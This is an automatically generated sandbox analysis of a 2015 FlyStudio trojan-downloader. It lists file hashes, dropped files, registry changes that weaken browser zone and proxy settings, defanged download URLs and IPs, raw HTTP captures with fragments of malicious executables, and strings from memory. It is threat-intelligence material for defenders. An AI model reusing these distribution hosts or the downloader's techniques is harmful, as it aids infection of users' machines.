Trojan.Win32.FlyStudio_93b111c1a0

by malwarelabrobot on August 13th, 2015 in Malware Descriptions.

HEUR:Trojan-Downloader.Win32.Generic (Kaspersky), Trojan.Win32.FlyStudio.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 93b111c1a0a31e76b5729574bbdece6d
SHA1: 8c16e05b80405092310ee78d4e0d9dbdf39f3dbf
SHA256: 4da272d4d9de237b32daf9a6a234c69c1874d027e346d699a31192798d500eac
SSDeep: 12288:8XjMVYN6X4sWlRig2J7ClvZxVLvUoyUoKQt5ynmePVvO/xwV15:8Xu06XJMz GlL99yU 3ccM
Size: 723968 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6
Company: no certificate found
Created at: 2015-06-29 23:29:30
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

setup_30004.exe:2012
syunbo_53_1248.exe:1300

The Trojan injects its code into the following process(es):

%original file name%.exe:400

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process setup_30004.exe:2012 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\anote\Alarm.wav (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszF.tmp\nsisdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskE.tmp (35241 bytes)
%Program Files%\anote\uninstall.exe (2392 bytes)
%Program Files%\anote\anote.dat (286 bytes)
%Program Files%\anote\Language\chinese.ini (2 bytes)
%Documents and Settings%\%current user%\Desktop\¶à²Ê±ãÇ©.lnk (1 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\¶à²Ê±ãÇ©\жÔØ.lnk (1 bytes)
%Program Files%\anote\cfg.ini (124 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\¶à²Ê±ãÇ©\¶à²Ê±ãÇ©.lnk (1 bytes)
%Program Files%\anote\anote.exe (36078 bytes)
%Program Files%\anote\about.jpg (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszF.tmp\System.dll (11 bytes)
%Program Files%\anote\anote.dll (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\anote.png (243 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\¶à²Ê±ãÇ©\°ïÖú.lnk (286 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsuD.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszF.tmp\nsisdl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszF.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\anote.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszF.tmp (0 bytes)

The process %original file name%.exe:400 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\syunbo_53_1248.exe (6396 bytes)

The process syunbo_53_1248.exe:1300 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\dBwBAAAAAAAA (207286 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\psb[1].gif (383250 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\setup_30004[1].exe (81171 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Program Files%\setup_30004.exe (34350 bytes)

Registry activity

The process setup_30004.exe:2012 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\anote]
"anote" = "noteupdateservice"
"fixid" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{AA88D2B1-F3C6-4557-B709-06894DD6B6C0}]
"NoModify" = "1"

[HKCR\Applications\anote.exe]
"NoStartPage" = ""

[HKLM\SOFTWARE\anote]
"Names" = "noteupdateservice"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{AA88D2B1-F3C6-4557-B709-06894DD6B6C0}]
"InstallDate" = "20140812"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\anote\data]
"runtime" = "65000"
"LastVersion" = "1.35"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\anote]
"Version" = "1.35"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCR\CLSID\{F481F745-5C57-4f71-95B4-78546706C7A9}]
"QI" = "000C29AC63984C23B2F35C8C20B50EF2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{AA88D2B1-F3C6-4557-B709-06894DD6B6C0}]
"UninstallString" = "%Program Files%\anote\uninstall.exe _?=%Program Files%\anote"

[HKLM\SOFTWARE\anote]
"IconIndex" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{AA88D2B1-F3C6-4557-B709-06894DD6B6C0}]
"DisplayIcon" = "%Program Files%\anote\uninstall.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{AA88D2B1-F3C6-4557-B709-06894DD6B6C0}]
"DisplayName" = "anote (v1.35)"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "37 BB FA A7 8B 50 D5 ED 3E B0 BE F5 5C 21 DD A9"

[HKLM\SOFTWARE\anote]
"Count" = "1"
"instname" = "setup_30004.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\anote\data]
"rdata" = "bgQOVG8eWhYLCGQZGUQRVx5RC1YLB3F4S31vaQsYaBIuHX9AbWdrTxFpHW8IHQg5dHw8f2JpBVsnUQROVCthEHZPEx8XAgMZWUpxCBkKOhpeG29BXRpZQWMREEsWH01PXk9YHnZdVUg6RFtKMVw1X00Xe1VECk5EQ15eBX4DMFUVST5Y"

[HKLM\SOFTWARE\anote]
"(Default)" = "%Program Files%\anote"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{AA88D2B1-F3C6-4557-B709-06894DD6B6C0}]
"NoRepair" = "1"

[HKLM\SOFTWARE\anote]
"Options" = "1"

[HKCR\Applications\Uninstall.exe]
"NoStartPage" = ""

[HKLM\SOFTWARE\anote]
"InstallTime" = "2015812"

The process %original file name%.exe:400 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "57 24 3F 05 4E D1 D5 F0 64 98 36 23 7E 5C 56 F8"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process syunbo_53_1248.exe:1300 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%]
"setup_30004.exe" = "Muti Color Note"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "22 7C 66 57 A6 02 CE 62 54 4D FE B9 4B D0 2A 48"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
272edafd76205919cd3f5218cd14d247 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\setup_30004[1].exe
bfbe9995a89f75b55fdc9b756a41cbb7 c:\Program Files\anote\anote.dll
44fc98f03e2270629e9f9b19d6200588 c:\Program Files\anote\anote.exe
8eb8239f10f026307a10c9c3a71c5106 c:\Program Files\anote\uninstall.exe
272edafd76205919cd3f5218cd14d247 c:\Program Files\setup_30004.exe
1a1f4c4066d1d49db10b2b273b4efd9c c:\syunbo_53_1248.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: ?????
Product Version: 1.0.0.0
Legal Copyright: ?????? ????????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: ?????
Comments: ??????????(http://www.eyuyan.com)
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
UPX0 4096 671744 0 0 d41d8cd98f00b204e9800998ecf8427e
UPX1 675840 524288 521728 5.37025 f2a991e53cdcbbcb9355c64f56504a1f
.rsrc 1200128 204800 201216 4.47958 00414c43d8e228c2c17539fdd4adb18f

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://d.juezhao123.com/setup/setup_30004.exe 58.222.24.189
hxxp://www.jiuhuabuy.com/kuplay/930/871248/ 121.43.68.2
hxxp://120.55.137.126/1439353161-930-871248/
hxxp://rawtj.photo.store.qq.com/psb?/V11ocPuK4Lde3Q/o1lxhiN1xUeN16I9G2IBO1NuWCYmmN8D3gGbpJxI0bE!/r/dBwBAAAAAAAA 123.151.71.111
hxxp://image.juezhao123.com/img/30004.jpg?t=1930351 58.222.20.238


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY HTTP Request on Unusual Port Possibly Hostile
ET POLICY Unsupported/Fake Windows NT Version 5.0
ET CURRENT_EVENTS Potential Fast Flux Rogue Antivirus (Setup_245.exe)
GPL SHELLCODE x86 NOOP

Traffic

GET /img/30004.jpg?t=1930351 HTTP/1.0
Host: image.juezhao123.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Wed, 12 Aug 2015 04:15:56 GMT
Content-Type: image/jpeg
Content-Length: 243
Last-Modified: Sat, 08 Aug 2015 04:10:03 GMT
Connection: close
Accept-Ranges: bytes
[Settings]..iconindex=1..pos=..width=550..height=400..border=10..toolt
ip=0..titleheight=50..trayiconindex=0..showstatus=0..transparent=10%..
newwidth=0..newheight=0..anote=100..noteupdateservice=1..menucolor=2..
sand=65000..float=1..order=desc....



GET /psb?/V11ocPuK4Lde3Q/o1lxhiN1xUeN16I9G2IBO1NuWCYmmN8D3gGbpJxI0bE!/r/dBwBAAAAAAAA HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: rawtj.photo.store.qq.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: max-age=94608000
Content-Length: 12293787
Content-Type: image/gif
Expires: Mon, 5 Dec 2050 07:25:14 GMT
Last-Modified: Mon, 18 Dec 2006 07:25:14 GMT
Server: httpserver
GIF87a....w..,............................................6.)6$..). $!
.0, ..O..a.*O.%f!.M%.r*1P3 n9L26883.../.9Jx:YMXiuSetup_20031123828....
i...R9...=v....LzZNqsc\Z`^alnVips*..8/.;M.<g.K5.L:.FI.LC.CU.EX.WF.X
H.TT.Gh.Mb.Jv.Ve.Wi.Xw.\q.]p.iN.sW.dj.fl.gx.lw.va.|g.w{.s|.fw._{.jw.n.
0x.4W.XV.ni.Sh.m}.Qv.qV..u..w..v..p..o....[.,d..X..g.&_.-r.U..Z$.j..g,
.zy.Hy.dC.._..s.)x..u.U..T0.q..p'.\.._&.t..s$.D..hI.|i.8..]..n..m..T..
n..u..y..|.....3.....,..M..W..h..s..K..S..q...?..:..T..{..T..s..<..
[..L..q..X..... .....6.....)........K..m..N..n..O..i..L..o...../..;..N
..r..n..L..q..........................................................
......................................................................
......................................................................
........................p.D.......... :.*\......#J.H.....3j...... C..I
......t@.....*Q.......8s&..$..xL........H.*].....P.J.J....X.j......`.~
.FT.4eh..5...Y.f.....X..f..#*........L......* .....E.:...(.b.8p.J.o...
C..M....F..F..i..H[{V*.....g..........].T].......n.....)........k.....
...F....|.....Nj........O.........oy.s..%.jJ]..e.aw...6...X...Y..../.T
._zM.E.....\...E^d..X".....jH..W....".8.x..$.(....)..~.&!m.E.a=]..N2':
......./...Lc2.......bQJD.W0...fQ^ ...g.R..e...1..I..|......V^4?YX.x@.
5%v.y.....B.4.| .A(Ea...Jc./.x.....j.Y...*..pp.QQ..B./Ep:D.Q...Q;4.E.J
01.."F.......:.8Z.1......Vk-SG".N1..SO<....zK}.i....Dd ....<.E..
E)...C.Zj.f......)..y&.L.....2l...1.. [email protected].^.....^..J.FA\.
.....,...-.......l.v3FQ.Y...._..Q..;.a..FD.N.#.(&e......Jsq.Z..EQ*
<<< skipped >>>


GET /kuplay/930/871248/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.jiuhuabuy.com
Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily
Date: Wed, 12 Aug 2015 04:19:22 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.17
location: hXXp://120.55.137.126/1439353161-930-871248/
0..HTTP/1.1 302 Moved Temporarily..Date: Wed, 12 Aug 2015 04:19:22 GMT
..Content-Type: text/html..Transfer-Encoding: chunked..Connection: kee
p-alive..X-Powered-By: PHP/5.2.17..location: hXXp://120.55.137.126/143
9353161-930-871248/..0..



GET /1439353161-930-871248/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: 120.55.137.126
Cache-Control: no-cache
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Wed, 12 Aug 2015 04:19:26 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Content-Disposition: attachment; filename=bobolicjlhgabdh.exe
Set-Cookie: route=;Path=/
HTTP/1.1 200 OK..Date: Wed, 12 Aug 2015 04:19:26 GMT..Content-Type: ap
plication/octet-stream..Transfer-Encoding: chunked..Connection: keep-a
live..X-Powered-By: PHP/5.2.17..Content-Disposition: attachment; filen
ame=bobolicjlhgabdh.exe..Set-Cookie: route=;Path=/..5a8..MZ...........
...........@...............................................!..L.!This 
program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu
..i...i...id..i!..i...i...it..iRichu..i........................PE..L..
...*J.................Z...........0.......p....@......................
....................................................s.................
......................................................................
p...............................text....X.......Z.................. ..
`.rdata.......p.......^..............@[email protected].......
[email protected][email protected]..............
..t..............@..@.................................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................U....\.}..t .}.F.E.u..H.....>B..H.P.
[email protected].>[email protected]@..}..e.
[email protected]... M.......M....3.....FQ.....NU..M..........VT
[email protected]@..u...
<<< skipped >>>


GET /setup/setup_30004.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: d.juezhao123.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Wed, 12 Aug 2015 12:08:14 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sat, 08 Aug 2015 12:04:05 GMT
ETag: "409d8-9da10-51ccb8c913a21"
Accept-Ranges: bytes
Content-Length: 645648
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..i
u..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L.....
oS.................\...........2.......p....@.........................
.................................................s...........'........
......h'...........................................................p..
.............................text....[.......\.................. ..`.r
data.......p.......`..............@[email protected]..........
[email protected][email protected]....'.......(...v
..............@..@....................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u....r@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Tp@[email protected]
....E..9}[email protected].}.j.W.E......E.......@[email protected]..
[email protected]<[email protected] [email protected]...\r@._
^3.[.....L$...7B...Si.....VW.T.....tO.q.3.;5.7B.sB..i......D.......t.G
.....t...O..t .....u...3....3...F.....;5.7B.r._^[...U..QQ.U.SV..i.
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_400:

`.rsrc
t$(SSh
~%UVW
u$SShe
hXXp://xiazai.lianmengqudao1.com:1227/down/u.php?d=yunbo_53_1248.exe
C:\syunbo_53_1248.exe
hXXp://VVV.jiuhuabuy.com/kuplay/930/871248/
C:\jufilo_930_871248.exe
#ÿf
H.Xli
\v.rFc
!2.mf
;:t%s
`pI
f<d
)%Y%C/j\
.vwuW
`.csh-[~
.nl!&q
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
user32.dll
.PAVCException@@
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
c:\%original file name%.exe
WinExec
GetProcessHeap
GetCPInfo
RegOpenKeyExA
RegCloseKey
RegCreateKeyExA
GetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
ShellExecuteA
GetKeyState
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
InternetCanonicalizeUrlA
InternetCrackUrlA
HttpOpenRequestA
HttpQueryInfoA
HttpSendRequestA
.text
`.rdata
@.data
.rsrc
J.text
#include "l.chs\afxres.rc" // Standard components
